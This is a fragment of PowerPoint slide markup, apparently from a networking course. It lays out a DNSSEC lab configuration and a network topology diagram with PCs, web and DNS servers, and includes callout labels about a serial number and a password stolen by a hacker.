            <a:off x="4815654" y="1979955"/>
            <a:ext cx="2736850" cy="855533"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99976"/>
              <a:gd name="adj2" fmla="val 161185"/>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serial number stolen by hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC204AAC-873E-DCFC-59C0-3A648762AB63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4815654" y="4592527"/>
            <a:ext cx="2736850" cy="855533"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -100844"/>
              <a:gd name="adj2" fmla="val -120592"/>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password stolen by hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3601696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8DECB-5AA9-F747-FF53-E6F1EAED5B5B}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{558EC134-A5F6-AF4B-7266-9E42ED0DD39A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>lab configuration with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and without redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AFD2DF7-C653-C256-79E6-C0B962CC50FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A24727-DE84-2C76-E4AE-C5EAFC1D2F3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10433B8-397D-3EC7-7F8A-E6DD1095870D}"/>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1972663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4537E-B476-C179-698B-903545D16B3D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DA8036B-55B9-21D3-E423-41B42539408A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2325716" y="6326233"/>
            <a:ext cx="904078" cy="79994"/>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22" name="Connettore diritto 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0126FC1-A479-273B-F92E-984D1E37B4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3229794" y="6156631"/>
            <a:ext cx="181044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94EB5B50-5E0D-13A3-288D-97A531C3411A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1917704" y="5790799"/>
            <a:ext cx="131027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327" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC8E626-7740-10D4-71F5-87645BB93067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1348638" y="3095873"/>
            <a:ext cx="7415" cy="505625"/>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9305" name="Connettore diritto 9304">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89B68C27-8F94-D991-9C69-FB108277C63D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9287" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764107" y="1822409"/>
            <a:ext cx="20032" cy="6474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298" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFA82E5F-5C2A-7C8F-F74B-2C7C74256ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="3033869"/>
            <a:ext cx="3526369" cy="265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9297" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5D78D0-7280-6D3C-4543-1F47BE96C2F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3799212" y="3881170"/>
            <a:ext cx="1286124" cy="6713"/>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55" name="Connettore diritto 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C00C7AD2-F1B7-5C79-238E-061D2A6FC252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5217619" y="5309001"/>
            <a:ext cx="7414" cy="6154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Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B933CFF-6CE1-CB42-02E8-1D725F2B5904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7403649" y="1891613"/>
            <a:ext cx="20032" cy="460633"/>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39" name="Connettore diritto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71353247-6AF6-42A5-0537-0D97F7067533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5691343" y="1822409"/>
            <a:ext cx="5866" cy="6358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8B6FD768-5E8C-E9DD-0C2A-799FF239F9BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4763186" y="1841489"/>
            <a:ext cx="0" cy="6023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BCCD692D-6598-410B-C4F7-CF47C72FD067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821141" y="1834146"/>
            <a:ext cx="0" cy="5992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220" name="Rectangle 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F9653AB-8A72-CE2E-1643-9A3577F8C142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>network topology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E85ABE-27B2-4AB8-6A3F-C0EEB856B4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E24BD5-4DB3-BA4C-7260-F3E7A57A454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2" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930B13E1-161B-1321-C0B4-78C102D2A02B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3532746" y="1220690"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E774EAE-5225-EEED-3973-C1F42695311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106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C079E84E-D51C-364A-40FC-EBF49AC58C85}"/>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pc1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3567802B-53B5-1411-78F1-BC46D7F28C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4474791" y="1228033"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F1CE0DB-9F4D-D9B7-392F-76DFF0C89BE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106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE901778-42A8-1A75-CB37-FC302FF0EF56}"/>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pc2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E6462C3-1DDF-1AC0-8251-D0616D25277B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1518965" y="5559356"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCBCE41A-0ABC-6C7E-EC87-742280A3F0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106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA900990-7F7A-3C5A-8A0E-ECBCD0F110B3}"/>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pc3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFD209A-7D61-3E78-E951-E11F3BE3D016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3440447" y="2446573"/>
            <a:ext cx="3852857" cy="2332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12" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAEA2E0C-F34E-95B7-19C0-E4927FC37F80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7293304" y="2363536"/>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A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB7F855-38F6-04FF-4725-637F9D601A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657018" y="1972871"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B736F1EF-FD3F-7252-441D-C685EA1DCB43}"/>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eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED026C9-1C48-DB9F-B34A-455EE4E0E2D6}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7395CAAE-155D-F337-7E43-C925BE480B47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4597668" y="1958829"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6DE43E-5662-600C-FBC6-442C3994A450}"/>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18" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85054BD5-F142-36C1-3550-74D1B420C044}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Gruppo 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A480030-472D-96B8-1E2B-EDB3BCD21DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5243610" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B71DB6-DDDF-D3A1-9543-66602D6BA07B}"/>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uniromatre</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAF4592D-3540-506C-0703-C1AC106E4CE9}"/>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34" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5779AFEF-B15D-F09E-D1EC-68A9756CC85C}"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59FB003-6059-D685-BCF9-15683DAD6374}"/>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WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{806051A9-54A8-4D4D-10E7-DDCC7AEE9C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5525825" y="1967277"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B12EF755-B5A2-162C-7805-ADD2527B1064}"/>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38" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EEBDF3-03AC-F505-144D-BE0133821CC6}"/>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50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Gruppo 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{559C95C7-D3BB-A84D-C273-DA234561834F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2150227" y="4015813"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76CED85-DA9D-0821-B16F-87DA8F3B03F4}"/>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42" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1719186D-7E7D-A582-D1BD-9CCC4C0B6CCE}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0EF7D89-01EA-8D90-24BB-469D02D62173}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA061DD-7415-3821-0DBD-2C92C722022A}"/>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dnsit</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
